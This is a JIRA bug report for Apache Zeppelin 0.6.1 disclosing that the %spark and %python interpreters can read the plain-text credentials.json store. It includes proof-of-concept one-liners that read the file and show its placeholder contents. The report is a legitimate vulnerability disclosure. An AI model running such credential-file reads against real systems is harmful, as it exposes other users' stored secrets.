Dmitry Zhukov created ZEPPELIN-1497:
---------------------------------------
Summary: %spark and %python interpreters are able to read
credentials.json file
Key: ZEPPELIN-1497
URL: https://issues.apache.org/jira/browse/ZEPPELIN-1497
Project: Zeppelin
Issue Type: Bug
Affects Versions: 0.6.1
Reporter: Dmitry Zhukov
Currently DB credentials for all users are stored in a plain text file on disk.
This file is readable by any interpreter capable of running arbitrary code with
Zeppelin user privileges, e.g. %python or %spark.
{code}
%spark
scala.io.Source.fromFile("/home/ubuntu/zeppelin-0.6.1-bin-netinst/conf/credentials.json").mkString
{code}
{noformat}
res6: String =
{
"credentialsMap": {
"anonymous": {
"userCredentials": {
"testdb": {
"username": "user",
"password": "pass"
}
}
}
}
}
{noformat}
{code}
%python
open("/home/ubuntu/zeppelin-0.6.1-bin-netinst/conf/credentials.json",
'r').read()
{code}
{noformat}
'{\n "credentialsMap": {\n "anonymous": {\n "userCredentials": {\n
"testdb": {\n "username": "user",\n "password": "pass"\n
}\n }\n }\n }\n}'
{noformat}
Basically if one has %python or %spark interpreters enabled it makes the whole
credentials store useless and even dangerous.
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
